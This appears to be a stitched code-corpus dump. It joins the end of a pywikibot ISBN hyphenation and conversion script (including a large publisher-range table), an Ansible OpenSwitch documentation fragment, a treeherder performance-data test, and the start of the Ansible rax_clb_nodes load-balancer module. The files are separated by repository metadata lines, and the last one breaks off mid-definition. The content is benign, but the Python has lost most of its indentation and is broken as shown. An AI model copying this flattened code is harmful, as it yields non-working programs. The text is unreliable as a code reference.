('30', '49'),
('500', '899'),
('9000', '9499'),
('95000', '99999'),
],
    '988': [ # Hong Kong
('00', '16'),
('17000', '19999'),
('200', '799'),
('8000', '9699'),
('97000', '99999'),
],
'989': [ # Portugal
('0', '1'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'9937': [ # Nepal
('0', '2'),
('30', '49'),
('500', '799'),
('8000', '9999'),
],
'9938': [ # Tunisia
('00', '79'),
('800', '949'),
('9500', '9999'),
],
'9939': [ # Armenia
('0', '4'),
('50', '79'),
('800', '899'),
('9000', '9999'),
],
'9940': [ # Montenegro
('0', '1'),
('20', '49'),
('500', '899'),
('9000', '9999'),
],
'9941': [ # Georgia
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9942': [ # Ecuador
('00', '89'),
('900', '994'),
('9950', '9999'),
],
'9943': [ # Uzbekistan
('00', '29'),
('300', '399'),
('4000', '9999'),
],
'9944': [ # Turkey
('0', '2'),
('300', '499'),
('5000', '5999'),
('60', '89'),
('900', '999'),
],
'9945': [ # Dominican Republic
('00', '00'),
('010', '079'),
('08', '39'),
('400', '569'),
('57', '57'),
('580', '849'),
('8500', '9999'),
],
'9946': [ # Korea, P.D.R.
('0', '1'),
('20', '39'),
('400', '899'),
('9000', '9999'),
],
'9947': [ # Algeria
('0', '1'),
('20', '79'),
('800', '999'),
],
'9948': [ # United Arab Emirates
('00', '39'),
('400', '849'),
('8500', '9999'),
],
'9949': [ # Estonia
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9950': [ # Palestine
('00', '29'),
('300', '840'),
('8500', '9999'),
],
'9951': [ # Kosova
('00', '39'),
('400', '849'),
('8500', '9999'),
],
'9952': [ # Azerbaijan
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'9953': [ # Lebanon
('0', '0'),
('10', '39'),
('400', '599'),
('60', '89'),
('9000', '9999'),
],
'9954': [ # Morocco
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'9955': [ # Lithuania
('00', '39'),
('400', '929'),
('9300', '9999'),
],
'9956': [ # Cameroon
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9957': [ # Jordan
('00', '39'),
('400', '699'),
('70', '84'),
('8500', '9999'),
],
'9958': [ # Bosnia and Herzegovina
('0', '0'),
('10', '49'),
('500', '899'),
('9000', '9999'),
],
'9959': [ # Libya
('0', '1'),
('20', '79'),
('800', '949'),
('9500', '9999'),
],
'9960': [ # Saudi Arabia
('00', '59'),
('600', '899'),
('9000', '9999'),
],
'9961': [ # Algeria
('0', '2'),
('30', '69'),
('700', '949'),
('9500', '9999'),
],
'9962': [ # Panama
('00', '54'),
('5500', '5599'),
('56', '59'),
('600', '849'),
('8500', '9999'),
],
'9963': [ # Cyprus
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9999'),
],
'9964': [ # Ghana
('0', '6'),
('70', '94'),
('950', '999'),
],
'9965': [ # Kazakhstan
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9966': [ # Kenya
('00', '69'),
('7000', '7499'),
('750', '959'),
('9600', '9999'),
],
'9967': [ # Kyrgyzstan
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9968': [ # Costa Rica
('00', '49'),
('500', '939'),
('9400', '9999'),
],
'9970': [ # Uganda
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9971': [ # Singapore
('0', '5'),
('60', '89'),
('900', '989'),
('9900', '9999'),
],
'9972': [ # Peru
('00', '09'),
('1', '1'),
('200', '249'),
('2500', '2999'),
('30', '59'),
('600', '899'),
('9000', '9999'),
],
'9973': [ # Tunisia
('0', '05'),
('060', '089'),
('0900', '0999'),
('10', '69'),
('700', '969'),
('9700', '9999'),
],
'9974': [ # Uruguay
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9499'),
('95', '99'),
],
'9975': [ # Moldova
('0', '0'),
('100', '399'),
('4000', '4499'),
('45', '89'),
('900', '949'),
('9500', '9999'),
],
'9976': [ # Tanzania
('0', '5'),
('60', '89'),
('900', '989'),
('9990', '9999'),
],
'9977': [ # Costa Rica
('00', '89'),
('900', '989'),
('9900', '9999'),
],
'9978': [ # Ecuador
('00', '29'),
('300', '399'),
('40', '94'),
('950', '989'),
('9900', '9999'),
],
'9979': [ # Iceland
('0', '4'),
('50', '64'),
('650', '659'),
('66', '75'),
('760', '899'),
('9000', '9999'),
],
'9980': [ # Papua New Guinea
('0', '3'),
('40', '89'),
('900', '989'),
('9900', '9999'),
],
'9981': [ # Morocco
('00', '09'),
('100', '159'),
('1600', '1999'),
('20', '79'),
('800', '949'),
('9500', '9999'),
],
'9982': [ # Zambia
('00', '79'),
('800', '989'),
('9900', '9999'),
],
'9983': [ # Gambia
('80', '94'),
('950', '989'),
('9900', '9999'),
],
'9984': [ # Latvia
('00', '49'),
('500', '899'),
('9000', '9999'),
],
'9985': [ # Estonia
('0', '4'),
('50', '79'),
('800', '899'),
('9000', '9999'),
],
'9986': [ # Lithuania
('00', '39'),
('400', '899'),
('9000', '9399'),
('940', '969'),
('97', '99'),
],
'9987': [ # Tanzania
('00', '39'),
('400', '879'),
('8800', '9999'),
],
'9988': [ # Ghana
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9999'),
],
'9989': [ # Macedonia
('0', '0'),
('100', '199'),
('2000', '2999'),
('30', '59'),
('600', '949'),
('9500', '9999'),
],
'99901': [ # Bahrain
('00', '49'),
('500', '799'),
('80', '99'),
],
'99902': [ # Gabon - no ranges fixed yet
],
'99903': [ # Mauritius
('0', '1'),
('20', '89'),
('900', '999'),
],
'99904': [ # Netherlands Antilles; Aruba, Neth. Ant
('0', '5'),
('60', '89'),
('900', '999'),
],
'99905': [ # Bolivia
('0', '3'),
('40', '79'),
('800', '999'),
],
'99906': [ # Kuwait
('0', '2'),
('30', '59'),
('600', '699'),
('70', '89'),
('9', '9'),
],
'99908': [ # Malawi
('0', '0'),
('10', '89'),
('900', '999'),
],
'99909': [ # Malta
('0', '3'),
('40', '94'),
('950', '999'),
],
'99910': [ # Sierra Leone
('0', '2'),
('30', '89'),
('900', '999'),
],
'99911': [ # Lesotho
('00', '59'),
('600', '999'),
],
'99912': [ # Botswana
('0', '3'),
('400', '599'),
('60', '89'),
('900', '999'),
],
'99913': [ # Andorra
('0', '2'),
('30', '35'),
('600', '604'),
],
'99914': [ # Suriname
('0', '4'),
('50', '89'),
('900', '949'),
],
'99915': [ # Maldives
('0', '4'),
('50', '79'),
('800', '999'),
],
'99916': [ # Namibia
('0', '2'),
('30', '69'),
('700', '999'),
],
'99917': [ # Brunei Darussalam
('0', '2'),
('30', '89'),
('900', '999'),
],
'99918': [ # Faroe Islands
('0', '3'),
('40', '79'),
('800', '999'),
],
'99919': [ # Benin
('0', '2'),
('40', '69'),
('900', '999'),
],
'99920': [ # Andorra
('0', '4'),
('50', '89'),
('900', '999'),
],
'99921': [ # Qatar
('0', '1'),
('20', '69'),
('700', '799'),
('8', '8'),
('90', '99'),
],
'99922': [ # Guatemala
('0', '3'),
('40', '69'),
('700', '999'),
],
'99923': [ # El Salvador
('0', '1'),
('20', '79'),
('800', '999'),
],
'99924': [ # Nicaragua
('0', '2'),
('30', '79'),
('800', '999'),
],
'99925': [ # Paraguay
('0', '3'),
('40', '79'),
('800', '999'),
],
'99926': [ # Honduras
('0', '0'),
('10', '59'),
('600', '999'),
],
'99927': [ # Albania
('0', '2'),
('30', '59'),
('600', '999'),
],
'99928': [ # Georgia
('0', '0'),
('10', '79'),
('800', '999'),
],
'99929': [ # Mongolia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99930': [ # Armenia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99931': [ # Seychelles
('0', '4'),
('50', '79'),
('800', '999'),
],
'99932': [ # Malta
('0', '0'),
('10', '59'),
('600', '699'),
('7', '7'),
('80', '99'),
],
'99933': [ # Nepal
('0', '2'),
('30', '59'),
('600', '999'),
],
'99934': [ # Dominican Republic
('0', '1'),
('20', '79'),
('800', '999'),
],
'99935': [ # Haiti
('0', '2'),
('7', '8'),
('30', '59'),
('600', '699'),
('90', '99'),
],
'99936': [ # Bhutan
('0', '0'),
('10', '59'),
('600', '999'),
],
'99937': [ # Macau
('0', '1'),
('20', '59'),
('600', '999'),
],
'99938': [ # Srpska
('0', '1'),
('20', '59'),
('600', '899'),
('90', '99'),
],
'99939': [ # Guatemala
('0', '5'),
('60', '89'),
('900', '999'),
],
'99940': [ # Georgia
('0', '0'),
('10', '69'),
('700', '999'),
],
'99941': [ # Armenia
('0', '2'),
('30', '79'),
('800', '999'),
],
'99942': [ # Sudan
('0', '4'),
('50', '79'),
('800', '999'),
],
    '99943': [ # Albania
('0', '2'),
('30', '59'),
('600', '999'),
],
'99944': [ # Ethiopia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99945': [ # Namibia
('0', '5'),
('60', '89'),
('900', '999'),
],
'99946': [ # Nepal
('0', '2'),
('30', '59'),
('600', '999'),
],
'99947': [ # Tajikistan
('0', '2'),
('30', '69'),
('700', '999'),
],
'99948': [ # Eritrea
('0', '4'),
('50', '79'),
('800', '999'),
],
'99949': [ # Mauritius
('0', '1'),
('20', '89'),
('900', '999'),
],
'99950': [ # Cambodia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99951': [ # Congo - no ranges fixed yet
],
'99952': [ # Mali
('0', '4'),
('50', '79'),
('800', '999'),
],
'99953': [ # Paraguay
('0', '2'),
('30', '79'),
('800', '999'),
],
'99954': [ # Bolivia
('0', '2'),
('30', '69'),
('700', '999'),
],
'99955': [ # Srpska
('0', '1'),
('20', '59'),
('600', '899'),
('90', '99'),
],
'99956': [ # Albania
('00', '59'),
('600', '999'),
],
}
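# Worked example of how the table above drives hyphenation: for the digits
# 0306406152, group '0' matches first; the remainder '306406152' starts with
# '306', which falls in this group's ('200', '699') publisher range, so the
# result is 0-306-40615-2 (publisher, item number, and check digit).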
class InvalidIsbnException(pywikibot.Error):
"""Invalid ISBN."""
class ISBN(object):
"""Abstract superclass."""
def format(self):
"""Put hyphens into this ISBN number."""
result = ''
rest = ''
for digit in self.digits():
rest += str(digit)
# Determine the prefix (if any)
for prefix in self.possiblePrefixes():
if rest.startswith(prefix):
result += prefix + '-'
rest = rest[len(prefix):]
break
# Determine the group
for groupNumber in ranges.keys():
if rest.startswith(groupNumber):
result += groupNumber + '-'
rest = rest[len(groupNumber):]
publisherRanges = ranges[groupNumber]
break
else:
raise InvalidIsbnException('ISBN %s: group number unknown.'
% self.code)
# Determine the publisher
for (start, end) in publisherRanges:
length = len(start) # NOTE: start and end always have equal length
if rest[:length] >= start and rest[:length] <= end:
result += rest[:length] + '-'
rest = rest[length:]
break
else:
raise InvalidIsbnException('ISBN %s: publisher number unknown.'
% self.code)
# The rest is the item number and the 1-digit checksum.
result += rest[:-1] + '-' + rest[-1]
self.code = result
class ISBN13(ISBN):
"""ISBN 13."""
def __init__(self, code, checksumMissing=False):
"""Constructor."""
self.code = code
if checksumMissing:
self.code += str(self.calculateChecksum())
self.checkValidity()
def possiblePrefixes(self):
"""Return possible prefixes."""
return ['978', '979']
def digits(self):
"""Return a list of the digits in the ISBN code."""
result = []
for c in self.code:
if c.isdigit():
result.append(int(c))
elif c != '-':
raise InvalidIsbnException(
'The ISBN %s contains invalid characters.' % self.code)
return result
def checkValidity(self):
"""Check validity of ISBN."""
if len(self.digits()) != 13:
raise InvalidIsbnException('The ISBN %s is not 13 digits long.'
% self.code)
if self.calculateChecksum() != self.digits()[-1]:
raise InvalidIsbnException('The ISBN checksum of %s is incorrect.'
% self.code)
def calculateChecksum(self):
"""
Calculate checksum.
See https://en.wikipedia.org/wiki/ISBN#Check_digit_in_ISBN_13
"""
sum = 0
for i in range(0, 13 - 1, 2):
sum += self.digits()[i]
for i in range(1, 13 - 1, 2):
sum += 3 * self.digits()[i]
return (10 - (sum % 10)) % 10
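    # Worked example: for the first twelve digits 978030640615 the weighted
    # sum is 9+8+3+6+0+1 + 3*(7+0+0+4+6+5) = 27 + 66 = 93, and
    # (10 - 93 % 10) % 10 = 7, giving the full ISBN 9780306406157.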
class ISBN10(ISBN):
"""ISBN 10."""
def __init__(self, code):
"""Constructor."""
self.code = code
self.checkValidity()
def possiblePrefixes(self):
"""Return possible prefixes."""
return []
def digits(self):
"""Return a list of the digits and Xs in the ISBN code."""
result = []
for c in self.code:
if c.isdigit() or c in 'Xx':
result.append(c)
elif c != '-':
raise InvalidIsbnException(
'The ISBN %s contains invalid characters.' % self.code)
return result
def checkChecksum(self):
"""Raise an InvalidIsbnException if the ISBN checksum is incorrect."""
# See https://en.wikipedia.org/wiki/ISBN#Check_digit_in_ISBN_10
sum = 0
for i in range(0, 9):
sum += (i + 1) * int(self.digits()[i])
checksum = sum % 11
lastDigit = self.digits()[-1]
if not ((checksum == 10 and lastDigit in 'Xx') or
(lastDigit.isdigit() and checksum == int(lastDigit))):
raise InvalidIsbnException('The ISBN checksum of %s is incorrect.'
% self.code)
def checkValidity(self):
"""Check validity of ISBN."""
if len(self.digits()) != 10:
raise InvalidIsbnException('The ISBN %s is not 10 digits long.'
% self.code)
if 'X' in self.digits()[:-1] or 'x' in self.digits()[:-1]:
raise InvalidIsbnException(
'ISBN %s: X is only allowed at the end of the ISBN.'
% self.code)
self.checkChecksum()
def toISBN13(self):
"""
Create a 13-digit ISBN from this 10-digit ISBN.
Adds the GS1 prefix '978' and recalculates the checksum.
The hyphenation structure is taken from the format of the original
ISBN number.
@rtype: L{ISBN13}
"""
code = '978-' + self.code[:-1]
return ISBN13(code, checksumMissing=True)
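    # Example: ISBN10('0-306-40615-2').toISBN13() drops the old check digit,
    # prepends '978-', and recomputes the checksum, yielding an ISBN13 with
    # code '978-0-306-40615-7'.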
def format(self):
"""Format ISBN number."""
# load overridden superclass method
ISBN.format(self)
# capitalize checksum
if self.code[-1] == 'x':
self.code = self.code[:-1] + 'X'
def getIsbn(code):
"""Return an ISBN object for the code."""
try:
i = ISBN13(code)
except InvalidIsbnException as e13:
try:
i = ISBN10(code)
except InvalidIsbnException as e10:
raise InvalidIsbnException(u'ISBN-13: %s / ISBN-10: %s'
% (e13, e10))
return i
def is_valid(isbn):
"""Check whether an ISBN 10 or 13 is valid."""
# isbnlib marks any ISBN10 with lowercase 'X' as invalid
isbn = isbn.upper()
try:
stdnum.isbn
except NameError:
pass
else:
try:
stdnum.isbn.validate(isbn)
except stdnum.isbn.InvalidFormat as e:
raise InvalidIsbnException(str(e))
except stdnum.isbn.InvalidChecksum as e:
raise InvalidIsbnException(str(e))
except stdnum.isbn.InvalidLength as e:
raise InvalidIsbnException(str(e))
return True
try:
isbnlib
except NameError:
pass
else:
if isbnlib.notisbn(isbn):
raise InvalidIsbnException('Invalid ISBN found')
return True
getIsbn(isbn)
return True
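# Usage sketch for is_valid (the backend actually consulted depends on which
# of the optional libraries imported above is installed):
#
#     try:
#         is_valid('978-0-306-40615-7')  # True if the checksum holds
#     except InvalidIsbnException as err:
#         pywikibot.output(err)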
def _hyphenateIsbnNumber(match):
"""Helper function to deal with a single ISBN."""
isbn = match.group('code')
isbn = isbn.upper()
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
try:
stdnum.isbn
except NameError:
pass
else:
i = stdnum.isbn.format(isbn)
return i
try:
isbn_hyphenate
except NameError:
pass
else:
try:
i = isbn_hyphenate.hyphenate(isbn)
except (isbn_hyphenate.IsbnMalformedError,
isbn_hyphenate.IsbnUnableToHyphenateError):
return isbn
return i
i = getIsbn(isbn)
i.format()
return i.code
hyphenateIsbnNumbers = partial(textlib.reformat_ISBNs,
match_func=_hyphenateIsbnNumber)
def _isbn10toIsbn13(match):
"""Helper function to deal with a single ISBN."""
isbn = match.group('code')
isbn = isbn.upper()
try:
stdnum.isbn
except NameError:
pass
else:
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
i = stdnum.isbn.to_isbn13(isbn)
return i
try:
isbnlib
except NameError:
pass
else:
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
# remove hyphenation, otherwise isbnlib.to_isbn13() returns None
i = isbnlib.canonical(isbn)
if i == isbn:
i13 = isbnlib.to_isbn13(i)
return i13
# add removed hyphenation
i13 = isbnlib.to_isbn13(i)
i13h = hyphenateIsbnNumbers('ISBN ' + i13)
return i13h[5:]
try:
is_valid(isbn)
except InvalidIsbnException:
# don't change
return isbn
i1x = getIsbn(isbn)
if not isinstance(i1x, ISBN13):
i13 = i1x.toISBN13()
else:
i13 = i1x
return i13.code
def convertIsbn10toIsbn13(text):
"""Helper function to convert ISBN 10 to ISBN 13."""
isbnR = re.compile(r'(?<=ISBN )(?P<code>[\d\-]+[Xx]?)')
text = isbnR.sub(_isbn10toIsbn13, text)
return text
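# Example: convertIsbn10toIsbn13('ISBN 0-306-40615-2') returns
# 'ISBN 978-0-306-40615-7'; codes without a preceding 'ISBN ' are left
# untouched because of the lookbehind in isbnR.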
class IsbnBot(Bot):
"""ISBN bot."""
def __init__(self, generator, **kwargs):
"""Constructor."""
self.availableOptions.update({
'to13': False,
'format': False,
})
super(IsbnBot, self).__init__(**kwargs)
self.generator = generator
self.isbnR = re.compile(r'(?<=ISBN )(?P<code>[\d\-]+[Xx]?)')
self.comment = i18n.twtranslate(pywikibot.Site(), 'isbn-formatting')
def treat(self, page):
"""Treat a page."""
try:
old_text = page.get()
for match in self.isbnR.finditer(old_text):
isbn = match.group('code')
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
new_text = old_text
if self.getOption('to13'):
new_text = self.isbnR.sub(_isbn10toIsbn13, new_text)
if self.getOption('format'):
new_text = self.isbnR.sub(_hyphenateIsbnNumber, new_text)
try:
self.userPut(page, page.text, new_text, summary=self.comment)
except pywikibot.EditConflict:
pywikibot.output(u'Skipping %s because of edit conflict'
% page.title())
except pywikibot.SpamfilterError as e:
pywikibot.output(
u'Cannot change %s because of blacklist entry %s'
% (page.title(), e.url))
except pywikibot.LockedPage:
pywikibot.output(u'Skipping %s (locked page)'
% page.title())
except pywikibot.NoPage:
pywikibot.output(u"Page %s does not exist"
% page.title(asLink=True))
except pywikibot.IsRedirectPage:
pywikibot.output(u"Page %s is a redirect; skipping."
% page.title(asLink=True))
def run(self):
"""Run the bot."""
for page in self.generator:
self.treat(page)
class IsbnWikibaseBot(WikidataBot):
"""ISBN bot to be run on Wikibase sites."""
use_from_page = None
def __init__(self, generator, **kwargs):
"""Constructor."""
self.availableOptions.update({
'to13': False,
'format': False,
})
self.isbn_10_prop_id = kwargs.pop('prop-isbn-10', None)
self.isbn_13_prop_id = kwargs.pop('prop-isbn-13', None)
super(IsbnWikibaseBot, self).__init__(**kwargs)
self.generator = generator
if self.isbn_10_prop_id is None:
self.isbn_10_prop_id = self.get_property_by_name('ISBN-10')
if self.isbn_13_prop_id is None:
self.isbn_13_prop_id = self.get_property_by_name('ISBN-13')
self.comment = i18n.twtranslate(pywikibot.Site(), 'isbn-formatting')
def treat_page_and_item(self, page, item):
"""Treat a page."""
change_messages = []
item.get()
if self.isbn_10_prop_id in item.claims:
for claim in item.claims[self.isbn_10_prop_id]:
isbn = claim.getTarget()
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
continue
old_isbn = "ISBN " + isbn
if self.getOption('format'):
new_isbn = hyphenateIsbnNumbers(old_isbn)
if self.getOption('to13'):
new_isbn = convertIsbn10toIsbn13(old_isbn)
item.claims[claim.getID()].remove(claim)
claim = pywikibot.Claim(self.repo, self.isbn_13_prop_id)
claim.setTarget(new_isbn)
if self.isbn_13_prop_id in item.claims:
item.claims[self.isbn_13_prop_id].append(claim)
else:
item.claims[self.isbn_13_prop_id] = [claim]
change_messages.append('Changing %s (%s) to %s (%s)' %
(self.isbn_10_prop_id, old_isbn,
self.isbn_13_prop_id, new_isbn))
continue
if old_isbn == new_isbn:
continue
# remove 'ISBN ' prefix
assert new_isbn.startswith('ISBN '), 'ISBN should start with "ISBN"'
new_isbn = new_isbn[5:]
claim.setTarget(new_isbn)
change_messages.append('Changing %s (%s --> %s)' %
(self.isbn_10_prop_id, old_isbn,
new_isbn))
# -format is the only option that has any effect on ISBN13
if self.getOption('format') and self.isbn_13_prop_id in item.claims:
for claim in item.claims[self.isbn_13_prop_id]:
isbn = claim.getTarget()
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
continue
old_isbn = "ISBN " + isbn
new_isbn = hyphenateIsbnNumbers(old_isbn)
if old_isbn == new_isbn:
continue
change_messages.append(
'Changing %s (%s --> %s)' % (self.isbn_13_prop_id,
claim.getTarget(), new_isbn))
claim.setTarget(new_isbn)
if change_messages:
self.current_page = item
pywikibot.output('\n'.join(change_messages))
self.user_edit_entity(item, summary=self.comment)
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: list of unicode
"""
options = {}
# Process global args and prepare generator args parser
local_args = pywikibot.handle_args(args)
genFactory = pagegenerators.GeneratorFactory()
# Check whether we're running on Wikibase site or not
# FIXME: See T85483 and run() in WikidataBot
site = pywikibot.Site()
data_site = site.data_repository()
use_wikibase = (data_site is not None and
data_site.family == site.family and
data_site.code == site.code)
for arg in local_args:
if arg.startswith('-prop-isbn-10:'):
options[arg[1:len('-prop-isbn-10')]] = arg[len('-prop-isbn-10:'):]
elif arg.startswith('-prop-isbn-13:'):
options[arg[1:len('-prop-isbn-13')]] = arg[len('-prop-isbn-13:'):]
elif arg.startswith('-') and arg[1:] in ('always', 'to13', 'format'):
options[arg[1:]] = True
else:
genFactory.handleArg(arg)
gen = genFactory.getCombinedGenerator(preload=True)
if gen:
if use_wikibase:
bot = IsbnWikibaseBot(gen, **options)
else:
bot = IsbnBot(gen, **options)
bot.run()
return True
else:
pywikibot.bot.suggest_help(missing_generator=True)
return False
if __name__ == "__main__":
main()
|
mit
|
adityacs/ansible
|
lib/ansible/utils/module_docs_fragments/openswitch.py
|
166
|
4001
|
#
# (c) 2015, Peter Sprygada <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = """
options:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport. Note this argument
        does not affect the SSH transport.
required: true
port:
description:
- Specifies the port to use when building the connection to the remote
device. This value applies to either I(cli) or I(rest). The port
value will default to the appropriate transport common port if
none is provided in the task. (cli=22, http=80, https=443). Note
this argument does not affect the SSH transport.
required: false
default: 0 (use common port)
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
either the CLI login or the eAPI authentication depending on which
transport is used. Note this argument does not affect the SSH
transport. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
required: false
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This is a common argument used for either I(cli)
or I(rest) transports. Note this argument does not affect the SSH
transport. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
required: false
default: null
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
    required: false
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This argument is only used for the I(cli)
transports. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_SSH_KEYFILE) will be used instead.
required: false
transport:
description:
- Configures the transport connection to use when connecting to the
remote device. The transport argument supports connectivity to the
device over ssh, cli or REST.
required: true
default: ssh
choices: ['ssh', 'cli', 'rest']
use_ssl:
description:
- Configures the I(transport) to use SSL if set to true only when the
I(transport) argument is configured as rest. If the transport
argument is not I(rest), this value is ignored.
required: false
default: yes
choices: ['yes', 'no']
provider:
description:
- Convenience method that allows all I(openswitch) arguments to be passed as
a dict object. All constraints (required, choices, etc) must be
met either by individual arguments or values in this dict.
required: false
default: null
"""
|
gpl-3.0
|
vaishalitekale/treeherder
|
tests/etl/test_perf_data_adapters.py
|
1
|
2747
|
import json
import zlib
from tests.sampledata import SampleData
from treeherder.etl.perf_data_adapters import TalosDataAdapter
def test_adapt_and_load():
talos_perf_data = SampleData.get_talos_perf_data()
tda = TalosDataAdapter()
result_count = 0
for datum in talos_perf_data:
datum = {
"job_guid": 'oqiwy0q847365qiu',
"name": "test",
"type": "test",
"blob": datum
}
job_data = {
"oqiwy0q847365qiu": {
"id": 1,
"result_set_id": 1,
"push_timestamp": 1402692388
}
}
reference_data = {
"property1": "value1",
"property2": "value2",
"property3": "value3"
}
# one extra result for the summary series
result_count += len(datum['blob']["results"]) + 1
# we create one performance series per counter
if 'talos_counters' in datum['blob']:
result_count += len(datum['blob']["talos_counters"])
# Mimic production environment, the blobs are serialized
# when the web service receives them
datum['blob'] = json.dumps({'talos_data': [datum['blob']]})
tda.adapt_and_load(reference_data, job_data, datum)
# we upload a summary with a suite and subtest values, +1 for suite
if 'summary' in datum['blob']:
results = json.loads(zlib.decompress(tda.performance_artifact_placeholders[-1][4]))
data = json.loads(datum['blob'])['talos_data'][0]
assert results["blob"]["performance_series"]["geomean"] == data['summary']['suite']
# deal with the subtests now
for i in range(0, len(data['summary']['subtests'])):
subresults = json.loads(zlib.decompress(tda.performance_artifact_placeholders[-1 - i][4]))
if 'subtest_signatures' in subresults["blob"]['signature_properties']:
# ignore summary signatures
continue
subdata = data['summary']['subtests'][subresults["blob"]['signature_properties']['test']]
for datatype in ['min', 'max', 'mean', 'median', 'std']:
assert subdata[datatype] == subresults["blob"]["performance_series"][datatype]
if 'value' in subdata.keys():
assert subdata['value'] == subresults["blob"]["performance_series"]['value']
else:
# FIXME: the talos data blob we're currently using contains datums with summaries and those without
# we should probably test non-summarized data as well
pass
assert result_count == len(tda.performance_artifact_placeholders)
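# For reference, a minimal sketch of one talos blob shape the loop above
# expects (field names inferred from the assertions; the values are made up):
#
#     {"results": {"a11y": [100, 102]},
#      "summary": {"suite": 101.0,
#                  "subtests": {"a11y": {"min": 100, "max": 102, "mean": 101,
#                                        "median": 101, "std": 1}}}}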
|
mpl-2.0
|
mschurenko/ansible-modules-core
|
cloud/rackspace/rax_clb_nodes.py
|
43
|
8603
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_clb_nodes
short_description: add, modify and remove nodes from a Rackspace Cloud Load Balancer
description:
- Adds, modifies and removes nodes from a Rackspace Cloud Load Balancer
version_added: "1.4"
options:
address:
required: false
description:
- IP address or domain name of the node
condition:
required: false
choices:
- enabled
- disabled
- draining
description:
- Condition for the node, which determines its role within the load
balancer
load_balancer_id:
required: true
type: integer
description:
- Load balancer id
node_id:
required: false
type: integer
description:
- Node id
port:
required: false
type: integer
description:
- Port number of the load balanced service on the node
state:
required: false
default: "present"
choices:
- present
- absent
description:
- Indicate desired state of the node
type:
required: false
choices:
- primary
- secondary
description:
- Type of node
wait:
required: false
default: "no"
choices:
- "yes"
- "no"
description:
- Wait for the load balancer to become active before returning
wait_timeout:
required: false
type: integer
default: 30
description:
- How long to wait before giving up and returning an error
weight:
required: false
description:
- Weight of node
author: Lukasz Kawczynski
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
# Add a new node to the load balancer
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
address: 10.2.2.3
port: 80
condition: enabled
type: primary
wait: yes
credentials: /path/to/credentials
# Drain connections from a node
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
node_id: 410
condition: draining
wait: yes
credentials: /path/to/credentials
# Remove a node from the load balancer
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
node_id: 410
state: absent
wait: yes
credentials: /path/to/credentials
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def _activate_virtualenv(path):
path = os.path.expanduser(path)
activate_this = os.path.join(path, 'bin', 'activate_this.py')
execfile(activate_this, dict(__file__=activate_this))
def _get_node(lb, node_id=None, address=None, port=None):
"""Return a matching node"""
for node in getattr(lb, 'nodes', []):
match_list = []
if node_id is not None:
match_list.append(getattr(node, 'id', None) == node_id)
if address is not None:
match_list.append(getattr(node, 'address', None) == address)
if port is not None:
match_list.append(getattr(node, 'port', None) == port)
if match_list and all(match_list):
return node
return None
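# Usage sketch (lb is a hypothetical pyrax load balancer object):
# _get_node(lb, node_id=410) matches on id alone, while
# _get_node(lb, address='10.2.2.3', port=80) requires both fields to match;
# with no criteria given it always returns None.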
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
address=dict(),
condition=dict(choices=['enabled', 'disabled', 'draining']),
load_balancer_id=dict(required=True, type='int'),
node_id=dict(type='int'),
port=dict(type='int'),
state=dict(default='present', choices=['present', 'absent']),
type=dict(choices=['primary', 'secondary']),
